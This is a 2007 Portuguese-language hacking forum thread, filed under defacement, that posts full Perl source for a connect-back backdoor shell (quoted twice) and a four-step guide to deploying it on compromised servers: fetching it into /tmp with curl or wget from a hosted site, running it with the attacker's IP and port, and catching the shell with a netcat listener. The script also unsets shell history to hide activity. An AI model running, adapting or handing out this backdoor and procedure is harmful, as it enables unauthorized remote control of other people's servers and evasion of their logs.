FORUM DARKERS

Segurança & Hacking => Defacement => Topic started by: oniarce on 27 de December , 2007, 08:55:20 PM

Title: Upar executar e conectar com a backdoor.
Post by: oniarce on 27 de December , 2007, 08:55:20 PM

Aqui esta o código fonte da Backdoor
FASE 1:
#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[li] Resolving HostName
#[li] Connecting... 127.0.0.1
#[li] Spawning Shell
#[li] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system   = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[li] Resolving HostName\n";
print "[li] Connecting... $ARGV[0] \n";
print "[li] Spawning Shell \n";
print "[li] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF????? ??????


Abra o bloco de noas e salve como back.pl, ospede em algum site.
FASE 2:
Depois de ter acesso a shell de algum faser os passos abaixo.
Geralmente as shells executam os comandos la onde esta escrito "Go dir".
Va no "Go dir" digite /tmp e precione ENTER.
(/tmp são os arquivos temporarios, geralmente você tem acesso rot lá)
Depois escreva:
curl www.site-com-a-backdoor/back.pl (http://www.site-com-a-backdoor/back.pl)
enves de curl você pode usar wget, lynx. Pronto a backdoor esta upada.
FASE 3:
Agora vamos compilar o backdoor na shaell.
perl back.pl xxx.xxx.xxx.xxx yyyy
onde:
xxx.xxx.xxx.xxx é seu IP
yyyy é a porta que você escolher.
FASE 4:
Agora vamos nos conectar ao backdoor.
Você presisa ter o Nacat.
Entre em Iniciar - Executar, e digite cmd.
Digite:
nc -vv -l -p yyyy

Observação:
Se  não conectar, tente executar a backdoor novamente, como nc escutando a porta.


Qualquer erro me avisem.
Title: Re: Upar executar e conectar com a backdoor.
Post by: branco on 27 de December , 2007, 09:11:19 PM
hmm essa tecnica se trata de conexão reversa né, o servidor se conecta ao seu netcat.
interessante, é bom lembrar que para o backdoor se conectar ao nosso computador, o netcat já deve estar em escuta.

espero que o código esteja funcionando direitim ^^

até, vlws
Title: Re: Upar executar e conectar com a backdoor.
Post by: oniarce on 27 de December , 2007, 09:13:12 PM
Ele esta sim.
Testado e aprovado  rsrs
 ;D
Title: Re: Upar executar e conectar com a backdoor.
Post by: rmoraes on 27 de December , 2007, 09:27:48 PM
Amigo so comferindo o exploit e este mesmo correto?

Quote#!/usr/bin/perl
use IO::Socket;
#IRAN HACKERS SABOTAGE Connect Back Shell
#code by:LorD
#We Are :LorD-C0d3r-NT
#
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#[li] Resolving HostName
#[li] Connecting... 127.0.0.1
#[li] Spawning Shell
#[li] Connected to remote host

#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 2121
#--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(lord) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system   = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==-- \n\n";
if ($ARGC!=2) {
   print "Usage: $0 [Host] [Port] \n\n";
   die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[li] Resolving HostName\n";
print "[li] Connecting... $ARGV[0] \n";
print "[li] Spawning Shell \n";
print "[li] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--  \n\n";
system("unset HISTFILE; unset SAVEHIST ;echo --==Systeminfo==-- ; uname -a;echo;
echo --==Userinfo==-- ; id;echo;echo --==Directory==-- ; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF????? ??????
Title: Re: Upar executar e conectar com a backdoor.
Post by: oniarce on 27 de December , 2007, 09:29:13 PM
Sim este mesmo.
Qualquer coisa me add no MSN que eu te passo ele correto.
oniarce@hotmail.com
Title: Re: Upar executar e conectar com a backdoor.
Post by: Wuefez on 27 de December , 2007, 09:37:39 PM
asuhasuhasuhsa

num acredito que essa porra ainda existe... primeira vez que vi esse script foi em 2004...... eu usava ele pra caramba na epoca do bug do awstats, nossa que nostalgia, como era facil fazer shell naquela epoca....